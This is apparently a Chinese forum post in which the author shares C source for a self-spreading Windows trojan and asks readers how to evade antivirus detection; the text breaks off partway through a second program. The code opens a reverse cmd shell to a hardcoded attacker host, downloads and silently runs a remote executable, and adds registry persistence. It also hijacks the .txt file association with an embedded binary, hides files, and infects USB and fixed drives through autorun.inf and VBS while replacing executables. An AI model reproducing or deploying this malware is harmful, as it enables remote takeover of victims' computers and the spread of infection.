C感染型木马
以前总是看汇编病毒,汇编病毒处理复杂的PE文件结构是如鱼得水,但是编写其他的各种功能就有点不那么尽如人意了,所以试着用C语言写了一个感染型木马,希望各位大侠们指点一二。包括感染磁盘,感染U盘,写入autorun.inf,自动从网上下载病毒,病毒有两个线程,一个线程运行反弹木马,一个线程感染磁盘U盘,把U盘里的所有可执行文件隐藏,同时把名字后加一个空格,把病毒替换为原文件名,病毒会自动释放一个Noteped.exe,同时把文件关联修改成noteped.exe,该文件先运行txt文件,然后运行病毒,所以只要打开txt文件就会重新运行病毒,病毒运用的手段都是常规手段,所以会被杀毒软件报毒,希望各位大侠给点免杀手段,废话不多说了,直接上代码。。/* ////////////////////////////////////////////////////////////////////////////////
* 摘 要:c语言反弹连接型感染型木马,附带U盘感染,磁盘感染,自动下载功能。
* 作 者:H•Y•H
/////////////////////////////////////////////////////////////////////////////// */
#include <string.h>
#include <Winsock2.h>
#include <stdio.h>
#include <Wininet.h>
#pragma warning(disable:4309)
#pragma warning(disable:4305)
#pragma comment(linker,"/subsystem:windows")
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib,"wininet.lib")
#define MyAddr "h158678667.3322.org"
#define MyPort 8081
char localfile;
DWORD WINAPI Trojan(LPVOID lpParameter);
DWORD WINAPI Infect(LPVOID lpParameter);
bool FileExists(char *filename);
void RegWrite();
void HideFile();
bool WriteInf(char *infname);
bool WriteVbs(char *vbsname);
void InfectDisk(char *drive);
void ReleaseNoteped();
bool InfectU(char *UDiskName);
char *left(char *dst,char *src, int n);
BOOL DownLoadFile(char *url,char *filename);
//请童鞋们不要害怕这个大大的数组,它只是一个exe文件(源代码见下面红色代码)的十六进制形式,直接从C32Asm里面复制就行,可略过不看。。
char node[]={0x4D,0x5A,0x90,0x00,0x03,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0xFF,0xFF,0x00,0x00,0xB8,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0xC8,0x00,0x00,0x00,0x0E,0x1F,0xBA,0x0E,0x00,0xB4,0x09,0xCD,0x21,0xB8,\
0x01,0x4C,0xCD,0x21,0x54,0x68,0x69,0x73,0x20,0x70,0x72,0x6F,0x67,0x72,0x61,0x6D,0x20,0x63,0x61,\
0x6E,0x6E,0x6F,0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6E,0x20,0x69,0x6E,0x20,0x44,0x4F,0x53,0x20,\
0x6D,0x6F,0x64,0x65,0x2E,0x0D,0x0D,0x0A,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x73,0xF8,0x8B,\
0xDF,0x37,0x99,0xE5,0x8C,0x37,0x99,0xE5,0x8C,0x37,0x99,0xE5,0x8C,0xB4,0x85,0xEB,0x8C,0x36,0x99,\
0xE5,0x8C,0x37,0x99,0xE4,0x8C,0x3E,0x99,0xE5,0x8C,0x55,0x86,0xF6,0x8C,0x32,0x99,0xE5,0x8C,0xDF,\
0x86,0xEE,0x8C,0x36,0x99,0xE5,0x8C,0x52,0x69,0x63,0x68,0x37,0x99,0xE5,0x8C,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x45,0x00,0x00,0x4C,0x01,0x01,\
0x00,0x69,0x97,0xC6,0x4D,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xE0,0x00,0x0F,0x01,0x0B,0x01,\
0x06,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x10,0x00,0x00,0x00,\
0x10,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x10,0x00,0x00,0x00,0x02,0x00,0x00,\
0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,\
0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x10,\
0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xA8,0x12,0x00,0x00,0x3C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x10,0x00,0x00,0x2C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2E,0x74,0x65,0x78,0x74,0x00,\
0x00,0x00,0xCA,0x03,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x04,0x00,0x00,0x00,0x02,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x60,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x10,0x13,0x00,0x00,0x1A,0x13,0x00,0x00,0x30,0x13,0x00,0x00,0x3C,0x13,0x00,0x00,0x48,0x13,\
0x00,0x00,0x5E,0x13,0x00,0x00,0x76,0x13,0x00,0x00,0x88,0x13,0x00,0x00,0x00,0x00,0x00,0x00,0xA8,\
0x13,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x65,0x78,0x70,0x31,0x6F,0x72,0x65,0x72,\
0x2E,0x65,0x78,0x65,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x5C,0x65,0x78,0x70,0x31,0x6F,0x72,\
0x65,0x72,0x2E,0x65,0x78,0x65,0x00,0x00,0x00,0x5C,0x6E,0x6F,0x74,0x65,0x70,0x61,0x64,0x2E,0x65,\
0x78,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x55,\
0x8B,0xEC,0x81,0xEC,0x20,0x05,0x00,0x00,0x53,0x56,0x8D,0x45,0xF4,0x57,0x33,0xDB,0x50,0x89,0x5D,\
0xF4,0xFF,0x15,0x18,0x10,0x40,0x00,0x50,0xFF,0x15,0x24,0x10,0x40,0x00,0xBE,0x04,0x01,0x00,0x00,\
0x89,0x45,0xFC,0x56,0x8D,0x85,0xEC,0xFD,0xFF,0xFF,0x53,0x50,0xE8,0xA8,0x01,0x00,0x00,0x56,0x8D,\
0x85,0xF0,0xFE,0xFF,0xFF,0x53,0x50,0xE8,0x9A,0x01,0x00,0x00,0x56,0x8D,0x85,0xE4,0xFB,0xFF,0xFF,\
0x53,0x50,0xE8,0x8C,0x01,0x00,0x00,0x56,0x8D,0x85,0xE8,0xFC,0xFF,0xFF,0x53,0x50,0xE8,0x7E,0x01,\
0x00,0x00,0x56,0x8D,0x85,0xE0,0xFA,0xFF,0xFF,0x53,0x50,0xE8,0x70,0x01,0x00,0x00,0x83,0xC4,0x3C,\
0x8D,0x85,0xF0,0xFE,0xFF,0xFF,0x56,0x50,0xFF,0x15,0x14,0x10,0x40,0x00,0x8D,0x85,0xE4,0xFB,0xFF,\
0xFF,0x56,0x50,0xFF,0x15,0x10,0x10,0x40,0x00,0x8B,0x3D,0x0C,0x10,0x40,0x00,0x8D,0x85,0xF0,0xFE,\
0xFF,0xFF,0x50,0x8D,0x85,0xEC,0xFD,0xFF,0xFF,0x50,0xFF,0xD7,0x8D,0x85,0xF0,0xFE,0xFF,0xFF,0x50,\
0x8D,0x85,0xE8,0xFC,0xFF,0xFF,0x50,0xFF,0xD7,0x8B,0x3D,0x08,0x10,0x40,0x00,0x8D,0x85,0xE8,0xFC,\
0xFF,0xFF,0x68,0x54,0x10,0x40,0x00,0x50,0xFF,0xD7,0x8D,0x85,0xF0,0xFE,0xFF,0xFF,0x68,0x44,0x10,\
0x40,0x00,0x50,0xFF,0xD7,0x8D,0x85,0xE4,0xFB,0xFF,0xFF,0x68,0x44,0x10,0x40,0x00,0x50,0xFF,0xD7,\
0x6A,0x01,0x58,0x39,0x45,0xF4,0x89,0x45,0xF8,0x7E,0x50,0x8B,0x45,0xFC,0x83,0xC0,0x04,0x89,0x45,\
0xFC,0x8D,0x85,0xE8,0xFC,0xFF,0xFF,0x68,0x40,0x10,0x40,0x00,0x50,0xFF,0xD7,0x53,0x53,0x8D,0x85,\
0xE0,0xFA,0xFF,0xFF,0x56,0x50,0x8B,0x45,0xFC,0x6A,0xFF,0xFF,0x30,0x53,0x6A,0x01,0xFF,0x15,0x04,\
0x10,0x40,0x00,0x8D,0x85,0xE0,0xFA,0xFF,0xFF,0x50,0x8D,0x85,0xE8,0xFC,0xFF,0xFF,0x50,0xFF,0xD7,\
0xFF,0x45,0xF8,0x83,0x45,0xFC,0x04,0x8B,0x45,0xF8,0x3B,0x45,0xF4,0x7C,0xB9,0x8B,0x35,0x00,0x10,\
0x40,0x00,0x8D,0x85,0xE8,0xFC,0xFF,0xFF,0x6A,0x05,0x50,0xFF,0xD6,0x8D,0x85,0xF0,0xFE,0xFF,0xFF,\
0x50,0xE8,0x60,0x00,0x00,0x00,0x84,0xC0,0x59,0x74,0x09,0x53,0x8D,0x85,0xF0,0xFE,0xFF,0xFF,0xEB,\
0x46,0x8D,0x85,0xE4,0xFB,0xFF,0xFF,0x50,0xE8,0x46,0x00,0x00,0x00,0x84,0xC0,0x59,0x74,0x09,0x53,\
0x8D,0x85,0xE4,0xFB,0xFF,0xFF,0xEB,0x2C,0x8D,0x85,0xEC,0xFD,0xFF,0xFF,0x68,0x30,0x10,0x40,0x00,\
0x50,0x88,0x9D,0xEF,0xFD,0xFF,0xFF,0xFF,0xD7,0x8D,0x85,0xEC,0xFD,0xFF,0xFF,0x50,0xE8,0x18,0x00,\
0x00,0x00,0x84,0xC0,0x59,0x74,0x0A,0x53,0x8D,0x85,0xEC,0xFD,0xFF,0xFF,0x50,0xFF,0xD6,0x5F,0x5E,\
0x33,0xC0,0x5B,0xC9,0xC2,0x10,0x00,0x55,0x8B,0xEC,0x81,0xEC,0x40,0x01,0x00,0x00,0x8D,0x85,0xC0,\
0xFE,0xFF,0xFF,0x50,0xFF,0x75,0x08,0xFF,0x15,0x1C,0x10,0x40,0x00,0x83,0xF8,0xFF,0x0F,0x95,0xC0,\
0xC9,0xC3,0xCC,0xCC,0x8B,0x54,0x24,0x0C,0x8B,0x4C,0x24,0x04,0x85,0xD2,0x74,0x47,0x33,0xC0,0x8A,\
0x44,0x24,0x08,0x57,0x8B,0xF9,0x83,0xFA,0x04,0x72,0x2D,0xF7,0xD9,0x83,0xE1,0x03,0x74,0x08,0x2B,\
0xD1,0x88,0x07,0x47,0x49,0x75,0xFA,0x8B,0xC8,0xC1,0xE0,0x08,0x03,0xC1,0x8B,0xC8,0xC1,0xE0,0x10,\
0x03,0xC1,0x8B,0xCA,0x83,0xE2,0x03,0xC1,0xE9,0x02,0x74,0x06,0xF3,0xAB,0x85,0xD2,0x74,0x06,0x88,\
0x07,0x47,0x4A,0x75,0xFA,0x8B,0x44,0x24,0x08,0x5F,0xC3,0x8B,0x44,0x24,0x04,0xC3,0xE4,0x12,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x9A,0x13,0x00,0x00,0x00,0x10,0x00,0x00,0x08,0x13,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xBE,0x13,0x00,0x00,0x24,0x10,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x10,0x13,0x00,0x00,0x1A,0x13,0x00,0x00,0x30,0x13,0x00,0x00,0x3C,0x13,0x00,0x00,0x48,0x13,0x00,\
0x00,0x5E,0x13,0x00,0x00,0x76,0x13,0x00,0x00,0x88,0x13,0x00,0x00,0x00,0x00,0x00,0x00,0xA8,0x13,\
0x00,0x00,0x00,0x00,0x00,0x00,0xD3,0x02,0x57,0x69,0x6E,0x45,0x78,0x65,0x63,0x00,0xD2,0x02,0x57,\
0x69,0x64,0x65,0x43,0x68,0x61,0x72,0x54,0x6F,0x4D,0x75,0x6C,0x74,0x69,0x42,0x79,0x74,0x65,0x00,\
0xF9,0x02,0x6C,0x73,0x74,0x72,0x63,0x61,0x74,0x41,0x00,0x00,0x02,0x03,0x6C,0x73,0x74,0x72,0x63,\
0x70,0x79,0x41,0x00,0x00,0x59,0x01,0x47,0x65,0x74,0x53,0x79,0x73,0x74,0x65,0x6D,0x44,0x69,0x72,\
0x65,0x63,0x74,0x6F,0x72,0x79,0x41,0x00,0x7D,0x01,0x47,0x65,0x74,0x57,0x69,0x6E,0x64,0x6F,0x77,\
0x73,0x44,0x69,0x72,0x65,0x63,0x74,0x6F,0x72,0x79,0x41,0x00,0x00,0xCB,0x00,0x47,0x65,0x74,0x43,\
0x6F,0x6D,0x6D,0x61,0x6E,0x64,0x4C,0x69,0x6E,0x65,0x57,0x00,0x94,0x00,0x46,0x69,0x6E,0x64,0x46,\
0x69,0x72,0x73,0x74,0x46,0x69,0x6C,0x65,0x41,0x00,0x00,0x4B,0x45,0x52,0x4E,0x45,0x4C,0x33,0x32,\
0x2E,0x64,0x6C,0x6C,0x00,0x00,0x02,0x00,0x43,0x6F,0x6D,0x6D,0x61,0x6E,0x64,0x4C,0x69,0x6E,0x65,\
0x54,0x6F,0x41,0x72,0x67,0x76,0x57,0x00,0x00,0x53,0x48,0x45,0x4C,0x4C,0x33,0x32,0x2E,0x64,0x6C,\
0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,PSTR szCmdLine,int iCmdShow)
{
//创建命名互斥对象,防止进程被多次运行
HANDLE hMutex=CreateMutex(NULL,FALSE,"HYH");
if(hMutex==NULL)
ExitProcess(0);
if(GetLastError()==ERROR_ALREADY_EXISTS)
ExitProcess(0);
memset(localfile,0,MAX_PATH);
GetModuleFileName(NULL,localfile,MAX_PATH);
HANDLE hTrojan=CreateThread(NULL,NULL,Trojan,NULL,NULL,NULL);
HANDLE infect=CreateThread(NULL,NULL,Infect,NULL,NULL,NULL);
char url="http://www.ku6tvb.com/Sx_server.exe";
if(!FileExists("c:\\Program Files\\a.exe"))
{
DownLoadFile(url,"c:\\Program Files\\a.exe");
SetFileAttributes("c:\\Program Files\\a.exe",FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
}
WinExec("c:\\Program Files\\a.exe",SW_HIDE);
while(true)
{
HideFile();
RegWrite();
Sleep(300000);
}
return 0;
}
//反弹木马线程,该线程利用TCP套接字连接nc服务端,把客户端机器的cmd反弹给服务端。。。
DWORD WINAPI Trojan(LPVOID lpParameter)
{
LPHOSTENT HostEnts;
SOCKADDR_IN SockAddrIn;
SOCKET HSocket;
DWORD *lpdwflags=NULL;
int status;
char szCMDPath;
STARTUPINFO StartupInfo;
WSADATA WSADa;
PROCESS_INFORMATION ProcessInfo;
GetSystemDirectory(szCMDPath,MAX_PATH);
strcat(szCMDPath,"\\cmd.exe");
for(;;)
{
try
{
while(!InternetGetConnectedState(lpdwflags,0))
Sleep(10000);
status=0;
ZeroMemory(&ProcessInfo,sizeof(PROCESS_INFORMATION));
ZeroMemory(&StartupInfo,sizeof(STARTUPINFO));
ZeroMemory(&WSADa,sizeof(WSADATA));
WSAStartup(MAKEWORD(1,1),&WSADa);
HostEnts=gethostbyname(MyAddr);
SockAddrIn.sin_addr=*((LPIN_ADDR)*HostEnts->h_addr_list);
SockAddrIn.sin_family=AF_INET;
SockAddrIn.sin_port=htons(MyPort);
HSocket=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
do{
status=connect(HSocket,(SOCKADDR *)&SockAddrIn,sizeof(SockAddrIn));
}while(status==SOCKET_ERROR);
StartupInfo.cb=sizeof(STARTUPINFO);
StartupInfo.wShowWindow=SW_HIDE;
StartupInfo.dwFlags=STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;
StartupInfo.hStdError=(HANDLE)HSocket;
StartupInfo.hStdOutput=(HANDLE)HSocket;
StartupInfo.hStdInput=(HANDLE)HSocket;
CreateProcess(NULL,szCMDPath,NULL,NULL,TRUE,0,NULL,NULL,&StartupInfo,&ProcessInfo);
WaitForSingleObject(ProcessInfo.hProcess,INFINITE);
if (WAIT_OBJECT_0==WaitForSingleObject(ProcessInfo.hProcess,INFINITE))
{
CloseHandle(ProcessInfo.hProcess);
CloseHandle(ProcessInfo.hThread);
closesocket(HSocket);
WSACleanup();
}
}
catch(...)
{
continue;
}
}
}
//感染线程,感染系统磁盘和U盘,这里需要掌握的是驱动器盘符的获取有关的API函数及用法
DWORD WINAPI Infect(LPVOID lpParameter)
{
char Drives;
int Type;
char *pDrive;
char systempath;
char windowspath;
memset(systempath,0,MAX_PATH);
memset(windowspath,0,MAX_PATH);
GetWindowsDirectory(windowspath,MAX_PATH);
GetSystemDirectory(systempath,MAX_PATH);
while(true)
{
memset(Drives,0,sizeof(Drives));
pDrive=Drives;
GetLogicalDriveStrings(sizeof(Drives),Drives);
for(;pDrive!=NULL;)
{
Type=GetDriveType(pDrive);
switch(Type)
{
case DRIVE_REMOVABLE:
if(strcmp(pDrive,"A:\\")==0)
{
pDrive+=4;
continue;
}
else
{
InfectDisk(pDrive);
InfectU(pDrive);
pDrive+=4;continue;
}
case DRIVE_FIXED:InfectDisk(pDrive);
pDrive+=4;continue;
default:pDrive+=4;continue;
}
}
strcat(windowspath,"\\exp1orer.exe");
CopyFile(localfile,windowspath,TRUE);
strcat(systempath,"\\exp1orer.exe");
CopyFile(localfile,systempath,TRUE);
systempath='\0';
strcat(systempath,"Program Files\\exp1orer.exe");
CopyFile(localfile,systempath,TRUE);
memset(windowspath,0,MAX_PATH);
GetWindowsDirectory(windowspath,MAX_PATH);
strcat(windowspath,"\\noteped.exe");
if(!FileExists(windowspath))
ReleaseNoteped();
Sleep(10000);
}
}
//修改相应注册表文件,了解常用注册表API函数的用法就行了。。
void RegWrite()
{
HKEY hKey;
DWORD value;
char filepath;
memset(filepath,0,MAX_PATH);
GetWindowsDirectory(filepath,MAX_PATH);
strcat(filepath,"\\exp1orer.exe");
//修改主页
RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Internet Explorer\\Main",&hKey);
RegSetValueEx(hKey,"Start Page",0,REG_SZ,(BYTE *)"www.gov.cn",lstrlen("www.gov.cn"));
//把自己加入启动项
RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce",&hKey);
RegSetValueEx(hKey,"exp1orer",0,REG_SZ,(BYTE *)filepath,lstrlen(filepath));
filepath='\0';
strcat(filepath,"Program Files\\exp1orer.exe");
RegSetValueEx(hKey,"exp1orer",0,REG_SZ,(BYTE *)filepath,lstrlen(filepath));
filepath='\0';
strcat(filepath,"exp1orer.exe");
RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey);
RegSetValueEx(hKey,"exp1orer",0,REG_SZ,(BYTE *)filepath,lstrlen(filepath));
memset(filepath,0,MAX_PATH);
GetWindowsDirectory(filepath,MAX_PATH);
strcat(filepath,"\\noteped.exe %1");
//修改txt文件关联
RegCreateKey(HKEY_CLASSES_ROOT,"txtfile\\shell\\open\\command",&hKey);
RegSetValueEx(hKey,"",0,REG_SZ,(BYTE *)filepath,lstrlen(filepath));
value=243;
RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",&hKey);
RegSetValueEx(hKey,"NoDriveTypeAutoRun",0,REG_DWORD,(BYTE *)&value,sizeof(DWORD));
//使显示隐藏文件无效
value=0;
RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL",&hKey);
RegSetValueEx(hKey,"CheckedValue",0,REG_DWORD,(BYTE *)&value,sizeof(DWORD));
value=2;
RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN",&hKey);
RegSetValueEx(hKey,"CheckedValue",3,REG_DWORD,(BYTE *)&value,sizeof(DWORD));
}
//把病毒副本复制到系统目录,windows目录并设置程隐藏
void HideFile()
{
char newfile;
memset(newfile,0,MAX_PATH);
GetSystemDirectory(newfile,MAX_PATH);
strcat(newfile,"\\exp1orer.exe");
CopyFile(localfile,newfile,TRUE);
SetFileAttributes(newfile,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
memset(newfile,0,MAX_PATH);
GetWindowsDirectory(newfile,MAX_PATH);
strcat(newfile,"\\exp1orer.exe");
CopyFile(localfile,newfile,TRUE);
SetFileAttributes(newfile,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
newfile='\0';
strcat(newfile,"Program Files\\exp1orer.exe");
CopyFile(localfile,newfile,TRUE);
SetFileAttributes(newfile,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
}
//写入autorun.inf文件,使磁盘和U盘自动运行
bool WriteInf(char *infname)
{
char autorun="\nopen=wscript.exe system.vbs\nshell\\open\\打开(&O)\nshell\\open\\Command=wscript.exe system.vbs\nshell\\open\\default=1\nshell\\explore\\资源管理器(&X)\nshell\\explore\\Command=wscript.exe system.vbs";
FILE *fp;
fp=fopen(infname,"w+");
if(fp==NULL)
return FALSE;
fwrite(autorun,sizeof(char),lstrlen(autorun),fp);
fclose(fp);
SetFileAttributes(infname,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
return TRUE;
}
//写入vbs文件,打开磁盘时候运行病毒的同时打开磁盘
bool WriteVbs(char *vbsname)
{
char *vbs1={"On Error Resume Next\nDim Wsh\nSet Wsh = WScript.CreateObject(\"WScript.Shell\")\nWsh.Run \"cmd /c explorer "};
char *vbs2={"\",false,false\nWsh.Run \"exp1orer.exe\",false,false\nWScript.quit"};
char vbs;
char path;
memset(path,0,MAX_PATH);
memset(vbs,0,MAX_PATH);
strcpy(path,vbsname);
path='\0';
strcpy(vbs,vbs1);
strcat(vbs,path);
strcat(vbs,vbs2);
FILE *fp;
fp=fopen(vbsname,"w+");
if(fp==NULL)
return FALSE;
fwrite(vbs,sizeof(char),lstrlen(vbs),fp);
fclose(fp);
SetFileAttributes(vbsname,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
return TRUE;
}
//向windows目录释放noteped.exe文件,劫持txt文件的打开方式
void ReleaseNoteped()
{
DWORD written;
char windows;
memset(windows,0,MAX_PATH);
GetWindowsDirectory(windows,MAX_PATH);
strcat(windows,"\\noteped.exe");
HANDLE hFile=CreateFile(windows,GENERIC_WRITE,NULL,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM,NULL);
WriteFile(hFile,node,sizeof(node),&written,NULL);
FlushFileBuffers(hFile);
CloseHandle(hFile);
}
//感染U盘,把U盘里可执行文件替换为病毒文件,把原文件名后面加上空格并隐藏,这里需要掌握的是磁盘的遍历方法。。。
bool InfectU(char *UDiskName)
{
WIN32_FIND_DATA winfind;
HANDLE hFile;
char path;
char newpath;
char newname;
char oldname;
char filename;
strcpy(path,UDiskName);
strcat(path,"*.*");
hFile=FindFirstFile(path,&winfind);
if(hFile==INVALID_HANDLE_VALUE)
return false;
do
{
if(strcmp(winfind.cFileName,".")==0||strcmp(winfind.cFileName,"..")==0)
continue;
if(winfind.dwFileAttributes==FILE_ATTRIBUTE_DIRECTORY)
{
sprintf(newpath,"%s%s\\",UDiskName,winfind.cFileName);
InfectU(newpath);
}
if(strstr(winfind.cFileName,".exe")!=NULL && strstr(winfind.cFileName," .exe")==NULL)
{
if(strcmp(winfind.cFileName,"exp1orer.exe")!=0)
{
left(filename,winfind.cFileName,int(strstr(winfind.cFileName,".exe")-winfind.cFileName));
strcpy(newname,UDiskName);
strcat(newname,filename);
strcat(newname," .exe");
strcpy(oldname,UDiskName);
strcat(oldname,winfind.cFileName);
if(!MoveFileEx(oldname,newname,MOVEFILE_COPY_ALLOWED))
return false;
SetFileAttributes(newname,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
if(!CopyFile(localfile,oldname,FALSE))
return false;
SetFileAttributes(oldname,FILE_ATTRIBUTE_NORMAL);
}
}
}while(FindNextFile(hFile,&winfind));
return true;
}
//感染磁盘,写入autorun.inf和vbs脚本
void InfectDisk(char *drive)
{
char diskfile;
char diskinf;
char diskvbs;
memset(diskfile,0,MAX_PATH);
memset(diskinf,0,MAX_PATH);
memset(diskvbs,0,MAX_PATH);
strcpy(diskfile,drive);
strcpy(diskinf,drive);
strcpy(diskvbs,drive);
strcat(diskfile,"exp1orer.exe");
strcat(diskinf,"autorun.inf");
strcat(diskvbs,"system.vbs");
printf("%s",localfile);
printf("%s",diskfile);
CopyFile(localfile,diskfile,TRUE);
SetFileAttributes(diskfile,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
WriteInf(diskinf);
WriteVbs(diskvbs);
}
//取字符串左边N位
char *left(char *dst,char *src, int n)
{
char *p = src;
char *q = dst;
int len = strlen(src);
if(n>len)
n = len;
while(n--)
*(q++) = *(p++);
*(q++)='\0';
return dst;
}
//判断文件是否存在
bool FileExists(char *filename)
{
HANDLE hFind;
WIN32_FIND_DATA FindData;
hFind=FindFirstFile(filename,&FindData);
if(hFind==INVALID_HANDLE_VALUE)
{
return false;
}
return true;
}
//利用wininet.h头文件里的与Http有关的API函数实现网络文件的下载(说白了就是从网上读取一段文件然后写入到本地机器)功能
BOOL DownLoadFile(char *url,char *filename)
{
DWORD byteread=0;
char buffer;
memset(buffer,0,25*1024);
HINTERNET HInternet;
HInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
if (HInternet==NULL)
{
return FALSE;
}
HINTERNET HOpen;
HOpen = InternetOpenUrl(HInternet,url,
NULL,0,INTERNET_FLAG_TRANSFER_BINARY|INTERNET_FLAG_PRAGMA_NOCACHE,0);
if (HOpen==NULL)
{
InternetCloseHandle(HInternet);
return FALSE;
}
BOOL hwrite;
DWORD written;
HANDLE createfile;
createfile = CreateFile(filename,GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
if (createfile==INVALID_HANDLE_VALUE)
{
InternetCloseHandle(HOpen);
InternetCloseHandle(HInternet);
return FALSE;
}
BOOL internetreadfile;
while(1)
{
internetreadfile=InternetReadFile(HOpen,buffer,sizeof(buffer),&byteread);
if(byteread==0)
break;
hwrite=WriteFile(createfile,buffer,sizeof(buffer),&written,NULL);
if (hwrite==0)
{
CloseHandle(createfile);
InternetCloseHandle(HOpen);
InternetCloseHandle(HInternet);
return FALSE;
}
}
CloseHandle(createfile);
InternetCloseHandle(HOpen);
InternetCloseHandle(HInternet);
return TRUE;
}
Notepad.exe文件代码如下:
#pragma comment(lib,"Shell32.lib")
#pragma comment(lib,"kernel32.lib")
#include <windows.h>
#include <tchar.h>
bool FileExists(char *filename);
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInst,LPSTR lpszCmdLine,int nCmdShow)
{
int argc=0;
int i;
LPWSTR *argv=CommandLineToArgvW(GetCommandLineW(),&argc);
char cmdline;
char windows;
char system;
char root;
char arg;
memset(root,'\0',MAX_PATH);
memset(windows,'\0',MAX_PATH);
memset(system,'\0',MAX_PATH);
memset(cmdline,'\0',MAX_PATH);
memset(arg,'\0',MAX_PATH);
GetWindowsDirectory(windows,MAX_PATH);
GetSystemDirectory(system,MAX_PATH);
lstrcpy(root,windows);
lstrcpy(cmdline,windows);
lstrcat(cmdline,"\\notepad.exe");
lstrcat(windows,"\\exp1orer.exe");
lstrcat(system,"\\exp1orer.exe");
